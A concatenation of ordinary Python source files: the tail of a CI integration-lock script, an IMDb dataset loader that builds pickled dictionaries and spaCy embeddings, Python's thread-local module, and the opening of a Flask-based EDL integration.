if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that has a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that passed since the creation of the 'lock_file' is more then 'lock_timeout'.
If not- it means that the integration represented by the lock file is currently locked and is tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has expired it's timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 30 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
imbd_data_loader.py | import os
from urllib import request
import subprocess
import csv
import sys
import pickle
from sklearn.preprocessing import MultiLabelBinarizer
import spacy
from functools import partial
from multiprocessing import Manager,Process
from scipy.sparse import lil_matrix
from scipy.sparse import csr_matrix
import numpy as np
import time
# nohup python imbd_data_loader.py > myprogram.out 2> myprogram.err &
csv.field_size_limit(sys.maxsize)
nbr_processes = 90
def embed_genre_dic(embed_dict, id2class_dic):
mlb = MultiLabelBinarizer(classes=list(embed_dict.values()), sparse_output=True)
def embed_genre(embed_dict, classes_str, mlb):
igenre=[embed_dict[genre] for genre in classes_str]
return mlb.fit_transform([set(igenre)])
newD = {k: embed_genre(embed_dict, v, mlb) for k, v in id2class_dic.items()}
return newD
def embed_word2vec(title, nlps):
vector=None
for nlp in nlps:
#print(title)
#s=time.time()
doc = nlp(title)
#e=time.time()
#print('nlp time')
#print(e-s)
if vector is None:
vector=doc.vector
else:
vector=np.concatenate((vector, doc.vector))
return vector
IMDB_DIR= '../../data/imdb_data/'
def _download_imdb(flag_overwrite=False):
if os.path.isdir(IMDB_DIR) is False:
os.mkdir(IMDB_DIR)
DOWNLOAD_INFO = [('title.basics.tsv.gz', 'https://datasets.imdbws.com/title.basics.tsv.gz'),
('title.akas.tsv.gz', 'https://datasets.imdbws.com/title.akas.tsv.gz'),
('title.crew.tsv.gz', 'https://datasets.imdbws.com/title.crew.tsv.gz'),
('name.basics.tsv.gz', 'https://datasets.imdbws.com/name.basics.tsv.gz')]
for save_name, url in DOWNLOAD_INFO:
if os.path.isfile(os.path.join(IMDB_DIR, save_name[:-3])):
print("Found {}, Skip".format(os.path.join(IMDB_DIR, save_name)))
else:
data_file = request.urlopen(url)
with open(os.path.join(IMDB_DIR, save_name), 'wb') as output:
output.write(data_file.read())
subprocess.call(['gunzip', '{}/{}'.format(IMDB_DIR, save_name)])
subprocess.call(['rm', '{}/{}'.format(IMDB_DIR, save_name)])
def read_imdb2dic(IMDB_DIR='../data/imdb_data/'):
_download_imdb()
titles2id_dic = {}
titles2year_dic = {}
_id2year_dic = {}
id2info_dic = {}
# TODO genre to multihot encoding
id2genre_dic = {}
with open(os.path.join(IMDB_DIR, "title.basics.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_name = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_name)
for row in IMDB_title_name:
str_id = row[0]
title_type = row[1].lower()
title1 = row[2].lower()
title2 = row[3].lower()
assert "\n" not in title1 and "\n" not in title2
is_adult=row[4]
start_year = row[5]
end_year = row[6]
runtime=row[7]
start_year = None if start_year == '\\N' else float(start_year)
end_year = None if end_year == '\\N' else float(end_year)
is_adult = None if is_adult == '\\N' else float(is_adult)
runtime = None if runtime == '\\N' else float(runtime)
if start_year is not None and len(row) == 9:
if str_id not in _id2year_dic:
_id2year_dic[str_id] = start_year
if str_id not in id2info_dic:
id2info_dic[str_id] = [title1,title2,( (start_year), (end_year)), title_type, (is_adult), (runtime)]
if str_id not in id2genre_dic:
id2genre_dic[str_id] = row[8].lower().split(",")
if title1 not in titles2id_dic:
titles2id_dic[title1] = {}
titles2id_dic[title1][str_id] = start_year
titles2year_dic[title1] = {}
titles2year_dic[title1][start_year] = [str_id]
else:
if str_id not in titles2id_dic[title1]:
titles2id_dic[title1][str_id] = start_year
if start_year not in titles2year_dic[title1]:
titles2year_dic[title1][start_year] = [str_id]
else:
titles2year_dic[title1][start_year].append(str_id)
if title2 != title1:
if title2 not in titles2id_dic:
titles2id_dic[title2] = {}
titles2id_dic[title2][str_id] = start_year
titles2year_dic[title2] = {}
titles2year_dic[title2][start_year] = [str_id]
else:
if str_id not in titles2id_dic[title2]:
titles2id_dic[title2][str_id] = start_year
if start_year not in titles2year_dic[title2]:
titles2year_dic[title2][start_year] = [str_id]
else:
titles2year_dic[title2][start_year].append(str_id)
else:
continue
else:
continue
with open(os.path.join(IMDB_DIR, "title.ratings.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_rating = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_rating)
for row in IMDB_title_rating:
str_id = row[0]
average_rating = row[1]
num_votes = row[2]
# TODO Check if this title is important or not.. does it exist in other dictionaries
if str_id not in id2info_dic:
id2info_dic[str_id] = [float(average_rating),float(num_votes)]
else:
id2info_dic[str_id]+=[float(average_rating),float(num_votes)]
with open(os.path.join(IMDB_DIR, "title.akas.tsv"), newline='', encoding='utf-8') as csvfile2:
IMDB_akas_name = (csv.reader(csvfile2, delimiter="\t"))
next(IMDB_akas_name)
for row in IMDB_akas_name:
str_id = row[0]
title3 = row[2].lower()
region=row[3].lower()
language=row[4].lower
# TODO decide if these attributes are needed.
if "\n" in title3:
print("len(title3)", len(title3))
continue
assert "\n" not in title3
if str_id in _id2year_dic:
year = _id2year_dic[str_id]
if title3 not in titles2id_dic:
titles2id_dic[title3] = {}
titles2id_dic[title3][str_id] = year
titles2year_dic[title3] = {}
titles2year_dic[title3][year] = [str_id]
else:
if str_id not in titles2id_dic[title3]:
titles2id_dic[title3][str_id] = year
if year not in titles2year_dic[title3]:
titles2year_dic[title3][year] = [str_id]
else:
titles2year_dic[title3][year].append(str_id)
else:
# only the akas with basic info are retained
continue
print("#title name: {}".format(len(titles2id_dic)))
print("#movie id: {}".format(len(id2info_dic)))
with open(os.path.join(IMDB_DIR,'_title_name2idsdic_dic.pkl'), 'wb') as f:
pickle.dump(titles2id_dic, f)
with open(os.path.join(IMDB_DIR,'_title_name2yeardic_dic.pkl'), 'wb') as f:
pickle.dump(titles2year_dic, f)
with open(os.path.join(IMDB_DIR, '_id2info_dic.pkl'), 'wb') as f:
pickle.dump(id2info_dic, f)
with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'wb') as f:
pickle.dump(id2genre_dic, f)
###################################################################################
###################################################################################
id2l_director_dic = {}
id2l_writer_dic = {}
id2l_principal_dic={}
with open(os.path.join(IMDB_DIR, "title.principals.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_principals = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_principals)
for row in IMDB_title_principals:
str_id = row[0]
ordering = row[1]
person_id = row[2]
job_category=row[3].lower()
job_title = row[4]
job_title = None if job_title == '\\N' else job_title.lower()
character = row[5]
character = None if character == '\\N' else character.lower()
# TODO is it an entry per person and movie or list of persons
if str_id not in id2l_principal_dic:
id2l_principal_dic[str_id] = [[person_id,job_category,job_title, character]]
else:
id2l_principal_dic[str_id] += [[person_id, job_category, job_title, character]]
# TODO Possible Bug. How about when only one or 2 directors or writers exists?
with open(os.path.join(IMDB_DIR, "title.crew.tsv"), newline='', encoding='utf-8') as csvfile:
file_rows = (csv.reader(csvfile, delimiter='\t'))
next(file_rows)
for row in file_rows:
id = row[0]
director_str = row[1]
writer_str = row[2]
if id in id2l_director_dic:
print(id, id2l_director_dic[id])
else:
if director_str != "\\N" and len(director_str) > 2:
director_vec = director_str.split(",")
id2l_director_dic[id] = director_vec
if id in id2l_writer_dic:
print(id, id2l_writer_dic[id])
else:
if writer_str != "\\N" and len(writer_str) > 2:
writer_vec = writer_str.split(",")
id2l_writer_dic[id] = writer_vec
with open(os.path.join(IMDB_DIR, '_id2director_dic.pkl'), 'wb') as f:
pickle.dump(id2l_director_dic, f)
with open(os.path.join(IMDB_DIR, '_id2writer_dic.pkl'), 'wb') as f:
pickle.dump(id2l_writer_dic, f)
# TODO test data dumping and loading
with open(os.path.join(IMDB_DIR, '_id2_principal_dic.pkl'), 'wb') as f:
pickle.dump(id2l_principal_dic, f)
###################################################################################
###################################################################################
people_id2name_dic = {}
with open(os.path.join(IMDB_DIR, "name.basics.tsv"), newline='', encoding='utf-8') as csvfile:
file_rows = (csv.reader(csvfile, delimiter='\t'))
next(file_rows)
for row in file_rows:
id = row[0]
name = row[1]
birthyear=row[2]
deathyear=row[3]
primaryProfession=row[4]
knownfortitles=row[5]
if id in people_id2name_dic:
print(id, people_id2name_dic[id])
else:
people_id2name_dic[id] = [name, birthyear, deathyear, primaryProfession, knownfortitles]
with open(os.path.join(IMDB_DIR, '_people_id2name_dic.pkl'), 'wb') as f:
pickle.dump(people_id2name_dic, f)
print("IMDb dics generated ...")
return titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic, \
id2l_director_dic, id2l_writer_dic,id2l_principal_dic, people_id2name_dic
def load_nlp_models(nlp_model='en_fr_lang'):
if nlp_model == 'small':
nlps_title = [spacy.load('xx_ent_wiki_sm')]
nlps_characters=nlps_title
nlps_primary_profession=nlps_title
elif nlp_model=='en_fr_lang':
nlp_eng = spacy.load('en_core_web_lg')
nlp_french = spacy.load('fr_core_news_md')
nlps_title= [nlp_eng,nlp_french]#,nlp_german,nlp_it,nlp_spanish]
nlps_characters = [nlp_eng]
nlps_primary_profession = [nlp_eng]
elif nlp_model=='various_lang':
nlp_eng = spacy.load('en_core_web_lg')
nlp_french = spacy.load('fr_core_news_md')
nlp_german = spacy.load('de_core_news_md')
nlp_it = spacy.load('it_core_news_sm')
nlp_spanish = spacy.load('es_core_news_md')
nlps_title= [nlp_eng,nlp_french,nlp_german,nlp_it,nlp_spanish]
nlps_characters = [nlp_eng]
nlps_primary_profession = [nlp_eng]
else:
raise ValueError("Not supported.")
return nlps_title,nlps_characters,nlps_primary_profession
def parallel_dict_nlp_processing(dictionary_to_transform, nlps):
'''
Parallel processing of dict rows with shared memory for obtaining the nlp representation
from the string entry of the dictionary
:param dictionary_to_transform: The dictionary whose entries will be transformed
:param nlps: the nlp models to use in the transformation
:return:
'''
def embed_titles(d, vs, ks):
for v, k in zip(vs, ks):
d[k] = embed_word2vec(v, nlps)
manager = Manager()
d = manager.dict()
keys, values = zip(*dictionary_to_transform.items())
len_per_split = len(keys) // nbr_processes
if len_per_split==0:
len_per_split=1
# TODO do not pass the whole value key only the subsets...
job=[]
for i in range(1, nbr_processes + 2):
if len_per_split * i >= len(values):
vs = values[len_per_split * (i - 1):]
ks = keys[len_per_split * (i - 1):]
else:
vs = values[len_per_split * (i - 1):len_per_split * (i)]
ks = keys[len_per_split * (i - 1):len_per_split * (i)]
job+= [Process(target=embed_titles, args=(d, vs,ks,))]
_ = [p.start() for p in job]
_ = [p.join() for p in job]
#print(d)
return d
def read_subset_imdb2dic(nlp_model='en_fr_lang', IMDB_DIR='../data/imdb_data/'):
#_download_imdb()
id2numer_info_dic = {}
id2str_info_dic = {}
id2genre_dic = {}
# TODO load first to dictionary and then process in parallel for the nlp model ...
nlps_title, nlps_characters, nlps_primary_profession = load_nlp_models(nlp_model)
with open(os.path.join(IMDB_DIR, "title.basics.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_name = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_name)
genre_embed_dict={}
count=0 #30 total
for row in IMDB_title_name:
#if count== 10:
# for debugging
# break
if len(row)==9:
str_id = row[0]
title_type = row[1].lower()
title1 = row[2].lower()
title2 = row[3].lower()
assert "\n" not in title1 and "\n" not in title2
is_adult=row[4]
start_year = row[5]
end_year = row[6]
runtime=row[7]
#print(row)
start_year = None if start_year == '\\N' else float(start_year)
end_year = None if end_year == '\\N' else float(end_year)
is_adult = None if is_adult == '\\N' else float(is_adult)
runtime = None if runtime == '\\N' else float(runtime)
if start_year is not None and len(row) == 9:
if str_id not in id2numer_info_dic:
id2numer_info_dic[str_id] = [start_year, end_year, title_type, (is_adult), (runtime)]
id2str_info_dic[str_id] =title1+' '+title2
if str_id not in id2genre_dic:
id2genre_dic[str_id] = row[8].lower().split(",")
for gen in id2genre_dic[str_id]:
if gen not in genre_embed_dict:
genre_embed_dict[gen]=count
count+=1
else:
continue
else:
continue
s=time.time()
id2genre_dic=embed_genre_dic(genre_embed_dict, id2genre_dic)
e=time.time()
print('Genre embedding runtime')
print(e - s)
s = time.time()
# get the real dict from the proxy dictionary of the multiprocessing
id2str_info_dic=dict(parallel_dict_nlp_processing(id2str_info_dic,nlps=nlps_title))
e = time.time()
print('Parallel processing runtime')
print(e - s)
print(len(id2str_info_dic.values()))
#print(id2str_info_dic.keys())
#print(id2str_info_dic)
with open(os.path.join(IMDB_DIR, "title.ratings.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_rating = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_rating)
for row in IMDB_title_rating:
str_id = row[0]
average_rating = row[1]
num_votes = row[2]
# TODO Check if this title is important or not.. does it exist in other dictionaries
if str_id in id2numer_info_dic:
id2numer_info_dic[str_id] +=\
[float(average_rating),float(num_votes)]
else:
id2numer_info_dic[str_id] = [float(average_rating), float(num_votes)]
print("#movie id: {}".format(len(id2numer_info_dic)))
with open(os.path.join(IMDB_DIR, '_id2numer_info_dic.pkl'), 'wb') as f:
pickle.dump(id2numer_info_dic, f)
with open(os.path.join(IMDB_DIR, '_id2str_info_dic.pkl'), 'wb') as f:
pickle.dump(id2str_info_dic, f)
with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'wb') as f:
pickle.dump(id2genre_dic, f)
sys.stdout.flush()
###################################################################################
###################################################################################
id2l_director_dic = {}
id2l_writer_dic = {}
id2l_principal_dic={}
# for different categories
mlb = MultiLabelBinarizer(classes=list(range(15)), sparse_output=True)
s = time.time()
with open(os.path.join(IMDB_DIR, "title.principals.tsv"), newline='', encoding='utf-8') as csvfile:
IMDB_title_principals = (csv.reader(csvfile, delimiter='\t'))
next(IMDB_title_principals)
total_category = 15
job_category_count = 0
job_category_dict = {}
job_title_dict = {}
zero_category=csr_matrix((total_category), dtype=np.int8)
for row in IMDB_title_principals:
if len(row)==6:
str_id = row[0]
ordering = row[1]
person_id = row[2]
job_category=row[3].lower()
job_title = row[4]
job_title = None if job_title == '\\N' else job_title.lower()
character = row[5]
character = None if character == '\\N' else character.lower()
# TODO is it an entry per person and movie or list of persons
if job_category is not None:
if job_category not in job_category_dict:
job_category_dict[job_category] = job_category_count
job_category_count += 1
if job_category_count>total_category:
print(job_category_count)
total_category=job_category_count
if job_category is not None:
#s=time.time()
job_category_one_hot=mlb.fit_transform([set(([job_category_dict[job_category]]))])
#e=time.time()
#print(e-s)
else:
job_category_one_hot=zero_category
job_category=job_category_one_hot
# TODO should we include job title and character played ? job category, more meaningfull
if str_id not in id2l_principal_dic:
id2l_principal_dic[str_id] = [[person_id,job_category]]#,job_title,character ]]
else:
id2l_principal_dic[str_id] += [[person_id, job_category]]#, job_title,character]]
else:
continue
e = time.time()
print('Read and process principals')
print(e - s)
#print(len(id2str_info_dic.values()))
# TODO Possible Bug. How about when only one or 2 directors or writers exists?
with open(os.path.join(IMDB_DIR, "title.crew.tsv"), newline='', encoding='utf-8') as csvfile:
file_rows = (csv.reader(csvfile, delimiter='\t'))
next(file_rows)
for row in file_rows:
id = row[0]
director_str = row[1]
writer_str = row[2]
if id in id2l_director_dic:
print(id, id2l_director_dic[id])
else:
if director_str != "\\N" and len(director_str) > 2:
director_vec = director_str.split(",")
id2l_director_dic[id] = director_vec
if id in id2l_writer_dic:
print(id, id2l_writer_dic[id])
else:
if writer_str != "\\N" and len(writer_str) > 2:
writer_vec = writer_str.split(",")
id2l_writer_dic[id] = writer_vec
with open(os.path.join(IMDB_DIR, '_id2director_dic.pkl'), 'wb') as f:
pickle.dump(id2l_director_dic, f)
with open(os.path.join(IMDB_DIR, '_id2writer_dic.pkl'), 'wb') as f:
pickle.dump(id2l_writer_dic, f)
# TODO test data dumping and loading
with open(os.path.join(IMDB_DIR, '_id2_principal_dic.pkl'), 'wb') as f:
pickle.dump(id2l_principal_dic, f)
sys.stdout.flush()
###################################################################################
###################################################################################
people_id2name_dic = {}
people_id2primaryProfession={}
# for different proffesions
mlb = MultiLabelBinarizer(classes=list(range(43)), sparse_output=True)
s=time.time()
with open(os.path.join(IMDB_DIR, "name.basics.tsv"), newline='', encoding='utf-8') as csvfile:
file_rows = (csv.reader(csvfile, delimiter='\t'))
count_professions = 0
professions_dict = {}
next(file_rows)
for row in file_rows:
id = row[0]
name = row[1]
birthyear=row[2]
deathyear=row[3]
primaryProfession=row[4]
knownfortitles=row[5]
birthyear = None if birthyear == '\\N' else float(birthyear)
deathyear = None if deathyear == '\\N' else float(deathyear)
for prof in primaryProfession.split(","):
if prof not in professions_dict:
professions_dict[prof] = count_professions
count_professions += 1
#primaryProfession= None if len(primaryProfession)==0 else embed_word2vec(primaryProfession,nlps_primary_profession)
if id in people_id2name_dic:
print(id, people_id2name_dic[id])
else:
people_id2name_dic[id] = [name, birthyear, deathyear, knownfortitles]
iprof=[professions_dict[prof] for prof in primaryProfession.split(',')]
people_id2primaryProfession[id]=mlb.fit_transform([set(iprof)])
with open(os.path.join(IMDB_DIR, '_people_id2name_dic.pkl'), 'wb') as f:
pickle.dump(people_id2name_dic, f)
with open(os.path.join(IMDB_DIR, '_people_id2primaryProfession.pkl'), 'wb') as f:
pickle.dump(people_id2primaryProfession, f)
print('Read and process people info')
e = time.time()
print(e - s)
#print(len(id2str_info_dic.values()))
print("IMDb dics generated ...")
sys.stdout.flush()
return id2numer_info_dic,id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic,\
id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
def load_imdb_dics():
with open(os.path.join(IMDB_DIR,'_title_name2idsdic_dic.pkl'), 'rb') as f:
titles2id_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_title_name2yeardic_dic.pkl'), 'rb') as f:
titles2year_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_id2info_dic.pkl'), 'rb') as f:
id2info_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'rb') as f:
id2genre_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2director_dic.pkl'), 'rb') as f:
id2l_director_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2_principal_dic.pkl'), 'rb') as f:
id2l_principal_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2writer_dic.pkl'), 'rb') as f:
id2l_writer_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_people_id2name_dic.pkl'), 'rb') as f:
people_id2name_dic = pickle.load(f)
print("IMDb dics loaded ...")
return titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic, \
id2l_director_dic, id2l_writer_dic,id2l_principal_dic, people_id2name_dic
def load_imdb_small_subset_dics():
with open(os.path.join(IMDB_DIR,'_id2numer_info_dic_small.pkl'), 'rb') as f:
id2numer_info_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2str_info_dic_small.pkl'), 'rb') as f:
id2str_info_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_id2genre_dic_small.pkl'), 'rb') as f:
id2genre_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2l_director_dic_small.pkl'), 'rb') as f:
id2l_director_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2l_principal_dic_small.pkl'), 'rb') as f:
id2l_principal_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2l_writer_dic_small.pkl'), 'rb') as f:
id2l_writer_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_people_id2name_dic_small.pkl'), 'rb') as f:
people_id2name_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_people_id2primaryProfession_small.pkl'), 'rb') as f:
people_id2primaryProfession = pickle.load(f)
print("IMDb dics loaded ...")
return id2numer_info_dic,id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic,\
id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
def load_imdb_subset_dics():
with open(os.path.join(IMDB_DIR,'_id2numer_info_dic.pkl'), 'rb') as f:
id2numer_info_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2str_info_dic.pkl'), 'rb') as f:
id2str_info_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'rb') as f:
id2genre_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2director_dic.pkl'), 'rb') as f:
id2l_director_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2_principal_dic.pkl'), 'rb') as f:
id2l_principal_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_id2writer_dic.pkl'), 'rb') as f:
id2l_writer_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR,'_people_id2name_dic.pkl'), 'rb') as f:
people_id2name_dic = pickle.load(f)
with open(os.path.join(IMDB_DIR, '_people_id2primaryProfession.pkl'), 'rb') as f:
people_id2primaryProfession = pickle.load(f)
print("IMDb dics loaded ...")
return id2numer_info_dic,id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic,\
id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
if __name__ == '__main__':
print("==================================================")
#load_imdb_subset_dics()
#titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic,\
#id2l_director_dic, id2l_writer_dic, id2l_principal_dic,people_id2name_dic = read_imdb2dic()
id2numer_info_dic, id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic, \
id2l_principal_dic, people_id2name_dic, people_id2primaryProfession = read_subset_imdb2dic() |
_threading_local.py | """Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that almost all platforms do have support for
# locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest on most boxes.
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if args or kw and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
current_thread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = current_thread().__dict__.get(key)
if d is None:
d = {}
current_thread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__(self):
import threading
key = object.__getattribute__(self, '_local__key')
try:
threads = list(threading.enumerate())
except:
# If enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up.
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace.
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
from threading import current_thread, RLock
|
EDL.py | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from flask import Flask, Response, request
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from typing import Callable, List, Any, Dict, cast
from base64 import b64decode
from copy import deepcopy
import re
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from multiprocessing import Process
class Handler:
@staticmethod
def write(msg):
demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'EDL'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-edl')
EDL_VALUES_KEY: str = 'dmst_edl_values'
EDL_LIMIT_ERR_MSG: str = 'Please provide a valid integer for EDL Size'
EDL_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
''' REFORMATTING REGEXES '''
_PROTOCOL_RE = re.compile('^(?:[a-z]+:)*//')
_PORT_RE = re.compile(r'^((?:[a-z]+:)*//([a-z0-9\-\.]+)|([a-z0-9\-\.]+))(?:\:[0-9]+)*')
_URL_WITHOUT_PORT = r'\g<1>'
_INVALID_TOKEN_RE = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
"""
Transforms a list to an str, with a custom delimiter between each list item
"""
str_res = ""
if inp_list:
if isinstance(inp_list, list):
str_res = delimiter.join(map(map_func, inp_list))
else:
raise AttributeError('Invalid inp_list provided to list_to_str')
return str_res
def get_params_port(params: dict = demisto.params()) -> int:
"""
Gets port from the integration parameters
"""
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def refresh_edl_context(indicator_query: str, limit: int = 0,
